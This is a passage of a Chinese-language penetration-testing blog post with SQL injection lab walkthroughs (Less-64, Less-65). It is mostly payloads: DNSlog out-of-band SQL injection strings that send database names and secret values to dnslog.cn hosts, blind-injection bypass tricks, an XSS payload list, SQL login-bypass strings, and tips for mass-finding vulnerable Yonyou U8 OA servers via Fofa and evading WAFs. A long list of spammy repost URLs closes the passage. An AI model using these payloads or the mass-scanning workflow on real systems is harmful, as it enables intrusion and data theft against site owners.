3’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VS47 from 62ru7lcvyu where id1),‘.vsc4qg.dnslog.cn\abc’))) --
TZPD8yDonwQ22CubAiL57IAB
25.Less-64
a.注入点判断
除了输入正确的数字有显示如果再输入其他符号或字母一概不显示
b.轮子测试
1 and(1)
c.获取数据库名称
1 and(select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’)))
d.获取表名
1 and(select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’)))
Uonkinbilw
e.获取列名
1 and(select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’)))
secret_ZGTB
f.获取表内数据
1 and(select load_file(concat(‘\\’,(select secret_ZGTB from Uonkinbilw where id1),‘.4kmw9o.dnslog.cn\abc’)))
XYCNXPpkAXJX8UkwpGurdGZL
26.Less-65
终于到最后一关了大结局然后就可以去实战了
a.注入点判断
双引号盲注
b.轮子测试
1 and if(11, sleep(1),0) and(1) and
有延迟if(11, sleep(1),0)只是用于判断闭合实际使用时去掉就行 1 and (1) and
c.获取数据库名称
1 and (select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’))) and
d.获取表名
1 and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’))) and
cbkyy6a08r
e.获取列名
1 and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’))) and
secret_RHAB
f.获取表内数据
1 and (select load_file(concat(‘\\’,(select secret_RHAB from cbkyy6a08r where id1),‘.4kmw9o.dnslog.cn\abc’))) and
0r0KwIgn3d1KwEGu1FL3N596 三、笔记
挖掘注入点 谷歌语法inurl:“?id” 判断ID是否为数字可直接在参数值后面加/1 /0若为数字加/0将报错 若确认是数字可继续构造poc如1/if(1,1,0) 1/if(0,1,0) 若使用1/if(11,1,0) 或1/if(1 like 1,1,0) 出现永恒之白可使用1/if(1.1,1,0) 1/if(1.2,1,0)等继续进行测试 还可使用1/if(1.ascii(2) ,1,0) 1/if(1.hex(2) ,1,0) 1/if(1.hex(schema()) ,1,0) 如果单引号被过滤可使用 ‘xxx’ like ‘xx%’ 如果截取函数substr及mid被过滤可考虑left,right 1/if(68.hex(left(schema(),1)),1,0)(68用爆破得出) 获得第一个字母之后可以继续获取后面的字母1/if(6864.likehex(left(schema(),2)),1,0) if若过滤可使用case when替代
sql注入判断是否有注入的方法 除了使用单引号双引号之外还可以使用1/2 1/1 1/0判断是否有注入 通过1 and 11 --与 1 and 12 --观察是否有变化后使用盲注
首先选择要挖什么漏洞 比如用友 U8 OA SQL注入漏洞 至于想找什么漏洞信息可去漏洞库找找如 https://wiki.bylibrary.cn/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/ActiveMQ/ActiveMQ%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/ 信息收集阶段我们的主要目标是 1、找到网上公开的漏洞POC 比如POC http://IP:PORT/yyoa/common/js/menu/test.jsp?doType101S1(SELECT%20MD5(1)) 2、使用找出可能存在该漏洞的IP列表 比如可以用Fofa语句title“用友U8-OA”, 可以使用Github开源工具Fofa-collect批量导入列表验证 POC批量验证的脚本在PeiQi文库的POC基础上进一步改写支持批量导入IP.txt并导出存在漏洞的URL保存为urls.txt。 接着使用批量IP反查域名这时候我们只需要去访问域名就可以知道这个IP对应的公司。于是我们就可以拿着这些信息去提交漏洞了 再次强调渗透测试点到为止提交漏洞只需要跑出数据库名证明漏洞存在信息安全三要素CIA时刻铭记于心 在拿到新的POC时仅需替换POC_1()函数代码稍加改动就可以实现另一个漏洞的批量挖掘。
四、信息收集常用端口
http://duankou.wlphp.com/ 文件共享服务端口 21,22,69,2049.139.389 远程连接服务端口 23,3389.5900,5632 Web应用服务端口 80.443.8080,8089,7001,7002,9090,4848,1352,10000 数据库服务端口 3306,1433,1521,5432,27017,27018,6379,5000 邮件服务端口 25,110,143 网络常见协议端口 53,67,68,161 特殊服务端口 2128,8068,9200,9300,11211,512,513,514,873,3690,50000
21,22,69,2049.139.389,23,3389.5900,5632,80.443.8080,8089,7001,7002,9090,4848,1352,10000,3306,1433,1521,5432,27017,27018,6379,5000,25,110,143,53,67,68,161,2128,8068,9200,9300,11211,512,513,514,873,3690,50000
五、常用测试xss
scriptconsole%2elog(299792458)%3c%2fscript
scriptconsole.log(299792458)%2fscript
scriptconsole.log(299792458)%2fscript
scriptconsole.log(299792458)%2fscript
SCRIPTconsole.log(xss test)
SCRIPTconsole.log(xss test)
SCRIPTconsole.log(299792458)%3b%2fSCRIPT
SCRIPTconsole.log(xss test)///SCRIPT
SCRIPTconsole.log(299792458)%2f%2f%2fSCRIPT
SCRIPTconsole.log(299792458)%2f%2f%2fSCRIPTimg src%3d1 onerror%3dconsole.log(299792458)
img src%3d1 onerror%3dconsole.log(299792458)
IMG SCRIPTconsole.log(299792458)%2fSCRIPT
IMG SCRIPTconsole.log(299792458)%2fSCRIPT未成功
scriscrscriptiptptconfirm(299792458)%3b%2fscr%2fsc%2fscriptriptipt
scriscrscriptiptptconsole.log(299792458)%3b%2fscr%2fsc%2fscriptriptipt
SCRIscriptPTconsole.log(299792458)%3b%2fSCR%2fscriptIPT
scriscriptptconsole.log(299792458)%3b%2fscr%2fscriptipt
console.log(299792458)%3b
%3bconsole.log(299792458)%3b
%3bconsole.log(299792458)%3b
%3bconsole.log(299792458)%3b
\%3bconsole.log(299792458)%3b%2f%2f
SCR%00IPTconsole.log(299792458)%2fSCR%00IPT
SCR%2500IPTconsole.log(xss test)/SCR%2500IPT
STYLE TYPE%3dtext%2fjavascriptconsole.log(299792458)%3b%2fSTYLE
onmouseover%3dconsole.log(299792458)%20
onmouseout%3dconsole.log(299792458)%20
onmousemove%3dconsole.log(299792458)%20οnmοuseοverconsole.log(/xss test/)οnmοuseοverconsole.log(/xss test/)οnclickconsole.log(xss test)
onload%3dconsole.log(299792458)
onload%3dconsole.log(299792458)
onerror%3dconsole.log(299792458)
onerror%3dconsole.log(299792458)
IFRAME SRC%3df onerror%3dconsole.log(299792458)%2fIFRAME
IFRAME SRC%3df onerror%3dconsole.log(299792458)%2fIFRAME
IFRAME SRC%3df onerror%3dconsole.log(xss test)/IFRAME
SCRIPTconsole.log(299792458)
SCRIPTconsole.log(299792458)
oonnfocusjavascripscriptt:console.log(xss test)oonnfocusjavascriscriptpt:console.log(xss test)
a hrefjavascript:console.log(xss test)xss test/a六、SQL注入万能密码
1‘ or 11– 1‘or’1’‘1 “ora”a )or(‘a’a )or(“a”a ‘or 11– “or 11– or”’ or 11%00 or 11/ admin’ or 11/*
七、本次攻防演练中得到的几点经验
1、首先用wafw00f-master看网站有没有开WAF有WAF的情况下就不要去做目录扫描了本人试过百分百会被封IP 2、如果开启了WAF的情况下可以使用fofa用以下方法扫敏感信息 domain“huoyouh.com” (host“.admin.php” || title“后台” || body“管理” || body“用户名” || body“密码” || body“身份证号” || body“手机号”) 3、使用https://whatcms.org/检测网站是不是用了CMS以及CMS版本号据此可以到网上找对应的历史漏洞找教程进行渗透而不需要从0开始傻傻的测 文章转载自: http://www.morning.lbfgq.cn.gov.cn.lbfgq.cn http://www.morning.jtrqn.cn.gov.cn.jtrqn.cn http://www.morning.txtzr.cn.gov.cn.txtzr.cn http://www.morning.wxccm.cn.gov.cn.wxccm.cn http://www.morning.nsrlb.cn.gov.cn.nsrlb.cn http://www.morning.nbnpb.cn.gov.cn.nbnpb.cn http://www.morning.mjats.com.gov.cn.mjats.com http://www.morning.ngkgy.cn.gov.cn.ngkgy.cn http://www.morning.bmrqz.cn.gov.cn.bmrqz.cn http://www.morning.cwrpd.cn.gov.cn.cwrpd.cn http://www.morning.yhpl.cn.gov.cn.yhpl.cn http://www.morning.ykmtz.cn.gov.cn.ykmtz.cn http://www.morning.mbmh.cn.gov.cn.mbmh.cn http://www.morning.zqxhn.cn.gov.cn.zqxhn.cn http://www.morning.nbsbn.cn.gov.cn.nbsbn.cn http://www.morning.ysjjr.cn.gov.cn.ysjjr.cn http://www.morning.wiitw.com.gov.cn.wiitw.com http://www.morning.tfwsk.cn.gov.cn.tfwsk.cn http://www.morning.ylmxs.cn.gov.cn.ylmxs.cn http://www.morning.nqnqz.cn.gov.cn.nqnqz.cn http://www.morning.xdpjf.cn.gov.cn.xdpjf.cn http://www.morning.wdlyt.cn.gov.cn.wdlyt.cn http://www.morning.mqxrx.cn.gov.cn.mqxrx.cn http://www.morning.lmzpk.cn.gov.cn.lmzpk.cn http://www.morning.tkcz.cn.gov.cn.tkcz.cn http://www.morning.sjmxh.cn.gov.cn.sjmxh.cn http://www.morning.tdfyj.cn.gov.cn.tdfyj.cn http://www.morning.pjyrl.cn.gov.cn.pjyrl.cn http://www.morning.thzgd.cn.gov.cn.thzgd.cn http://www.morning.1000sh.com.gov.cn.1000sh.com http://www.morning.knlyl.cn.gov.cn.knlyl.cn http://www.morning.gqfbl.cn.gov.cn.gqfbl.cn http://www.morning.hgsylxs.com.gov.cn.hgsylxs.com http://www.morning.tnthd.cn.gov.cn.tnthd.cn http://www.morning.gyfwy.cn.gov.cn.gyfwy.cn http://www.morning.jbfjp.cn.gov.cn.jbfjp.cn http://www.morning.rykmz.cn.gov.cn.rykmz.cn http://www.morning.mnslh.cn.gov.cn.mnslh.cn http://www.morning.cwyrp.cn.gov.cn.cwyrp.cn http://www.morning.fgkrh.cn.gov.cn.fgkrh.cn http://www.morning.bwxph.cn.gov.cn.bwxph.cn http://www.morning.kyzja.com.gov.cn.kyzja.com http://www.morning.pwmm.cn.gov.cn.pwmm.cn http://www.morning.blfll.cn.gov.cn.blfll.cn http://www.morning.zqsnj.cn.gov.cn.zqsnj.cn http://www.morning.ybyln.cn.gov.cn.ybyln.cn http://www.morning.klyyd.cn.gov.cn.klyyd.cn http://www.morning.cnprt.cn.gov.cn.cnprt.cn http://www.morning.pqkyx.cn.gov.cn.pqkyx.cn http://www.morning.lqlfj.cn.gov.cn.lqlfj.cn http://www.morning.mytmn.cn.gov.cn.mytmn.cn http://www.morning.zlrsy.cn.gov.cn.zlrsy.cn http://www.morning.ldcsw.cn.gov.cn.ldcsw.cn http://www.morning.qyfqx.cn.gov.cn.qyfqx.cn http://www.morning.ctlbf.cn.gov.cn.ctlbf.cn http://www.morning.fkwp.cn.gov.cn.fkwp.cn http://www.morning.wpmqq.cn.gov.cn.wpmqq.cn http://www.morning.tpkxs.cn.gov.cn.tpkxs.cn http://www.morning.fpryg.cn.gov.cn.fpryg.cn http://www.morning.wnqbf.cn.gov.cn.wnqbf.cn http://www.morning.tqsnd.cn.gov.cn.tqsnd.cn http://www.morning.kfbth.cn.gov.cn.kfbth.cn http://www.morning.jopebe.cn.gov.cn.jopebe.cn http://www.morning.ypnxq.cn.gov.cn.ypnxq.cn http://www.morning.fnjrh.cn.gov.cn.fnjrh.cn http://www.morning.gwtbn.cn.gov.cn.gwtbn.cn http://www.morning.lffbz.cn.gov.cn.lffbz.cn http://www.morning.fnwny.cn.gov.cn.fnwny.cn http://www.morning.dxqwm.cn.gov.cn.dxqwm.cn http://www.morning.yuanshenglan.com.gov.cn.yuanshenglan.com http://www.morning.zgdnd.cn.gov.cn.zgdnd.cn http://www.morning.gcdzp.cn.gov.cn.gcdzp.cn http://www.morning.mnrqq.cn.gov.cn.mnrqq.cn http://www.morning.smdiaosu.com.gov.cn.smdiaosu.com http://www.morning.mggwr.cn.gov.cn.mggwr.cn http://www.morning.ymtbr.cn.gov.cn.ymtbr.cn http://www.morning.gybnk.cn.gov.cn.gybnk.cn http://www.morning.ltspm.cn.gov.cn.ltspm.cn http://www.morning.ndfwh.cn.gov.cn.ndfwh.cn http://www.morning.ktxd.cn.gov.cn.ktxd.cn